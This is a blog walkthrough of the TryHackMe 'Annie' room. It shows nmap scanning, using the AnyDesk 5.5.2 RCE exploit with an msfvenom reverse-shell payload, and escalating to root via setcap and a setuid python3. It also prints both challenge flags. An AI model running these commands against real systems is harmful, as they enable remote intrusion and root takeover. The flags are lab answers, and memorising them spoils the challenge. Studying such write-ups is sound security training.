Annie

Jan 11, 2023·
Jeff Soczek
Jeff Soczek
· 4 min read

Remote access comes in different flavors. Another Try Hack Me free room, this one is classified with medium difficult.

First thing I try is to see if there’s some web response. No answer after trying to reach through port 80. Okay, I would run nmap anyway.


w1zard in try-hack-me/rooms/annie 
  nmap -Pn -p- -oA nmap-fullports-annie 10.10.92.77    
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-11 17:35 -03
Nmap scan report for 10.10.92.77
Host is up (0.35s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
7070/tcp  open  realserver
43353/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1082.16 seconds

Right, we can run the default script scan along with the service/version detection.


PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 72d72534e807b7d96fbad6981aa317db (RSA)
|   256 721026ce5c53084b6183f87ad19e9b86 (ECDSA)
|_  256 d10e6da84e8e20ce1f0032c1448dfe4e (ED25519)
7070/tcp open  ssl/realserver?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=AnyDesk Client
| Not valid before: 2022-03-23T20:04:30
|_Not valid after:  2072-03-10T20:04:30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I kinda wanted a version number, but let’s work with what we have in hand. Let me look for some exploits.


w1zard in try-hack-me/rooms/annie 
  searchsploit anydesk   
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation                         | windows/local/40410.txt
AnyDesk 5.4.0 - Unquoted Service Path                                              | windows/local/47883.txt
AnyDesk 5.5.2 - Remote Code Execution                                              | linux/remote/49613.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Going straight for the RCE.


w1zard in try-hack-me/rooms/annie 
  searchsploit -m 49613  
  Exploit: AnyDesk 5.5.2 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/49613
     Path: /usr/share/exploitdb/exploits/linux/remote/49613.py
    Codes: CVE-2020-13160
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/w1zard/Documents/labs/try-hack-me/rooms/annie/49613.py

A bit of inspection and, oh, great, there’s a link for a walkthough. I just have to change target IP, port and create a shellcode payload using MSVenom.


msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode

Shellcode goes into exploit, and exploit does nothing. I tried running the exploit a couple times, thought the machine was wonky and rebooted it. Executed the exploit a couple more of times, nothing. Fvck. Changed absolutely nothing, run the exploit a few more times…


connect to [10.13.3.36] from (UNKNOWN) [10.10.128.217] 45640

No logic, just repeat the same thing and maybe you’ll get a different result.


python3 -c 'import pty;pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

annie@desktop:/home/annie$ cat user.txt
cat user.txt
THM{N0t_Ju5t_ANY_D3sk}

Now for the privilege escalation, the way I found was through files owned by root.

find / -perm -4000 -type f -exec ls -al {} 2>/dev/null \;


annie@desktop:/home/annie$ find / -perm -4000 -type f -exec ls -al {} 2>/dev/null \;

< -perm -4000 -type f -exec ls -al {} 2>/dev/null \;
-rwsr-xr-x 1 root root 10232 Nov 16  2017 /sbin/setcap
-rwsr-xr-x 1 root root 43088 Sep 16  2020 /bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /bin/ping
-rwsr-xr-x 1 root root 44664 Jan 25  2022 /bin/su
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root 26696 Sep 16  2020 /bin/umount
-rwsr-xr-- 1 root dip 378600 Jul 23  2020 /usr/sbin/pppd
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Mar  2  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14328 Jan 12  2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 root root 10232 Dec 14  2021 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-- 1 root messagebus 42992 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 22528 Jun 28  2019 /usr/bin/arping
-rwsr-xr-x 1 root root 40344 Jan 25  2022 /usr/bin/newgrp
-rwsr-xr-x 1 root root 149080 Jan 19  2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 18448 Jun 28  2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 76496 Jan 25  2022 /usr/bin/chfn
-rwsr-xr-x 1 root root 75824 Jan 25  2022 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44528 Jan 25  2022 /usr/bin/chsh
-rwsr-xr-x 1 root root 59640 Jan 25  2022 /usr/bin/passwd
-rwsr-xr-x 1 root root 22520 Jan 12  2022 /usr/bin/pkexec

setcap is standing off from the list. Let me have a look at this.

waiting

Okay, you can force capabilities upon programs using setcap and they can be exploited by passing them malicious commands or arguments which are then run as root. Thanks HackTricks.


annie@desktop:/home/annie$ which python3
which python3
/usr/bin/python3
annie@desktop:/home/annie$ cp /usr/bin/python3 .
cp /usr/bin/python3 .
annie@desktop:/home/annie$ /sbin/setcap cap_setuid+ep /home/annie/python3
/sbin/setcap cap_setuid+ep /home/annie/python3
annie@desktop:/home/annie$ ./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
<c 'import os; os.setuid(0); os.system("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@desktop:/home/annie# cat /root/root.txt
cat /root/root.txt
THM{0nly_th3m_5.5.2_D3sk}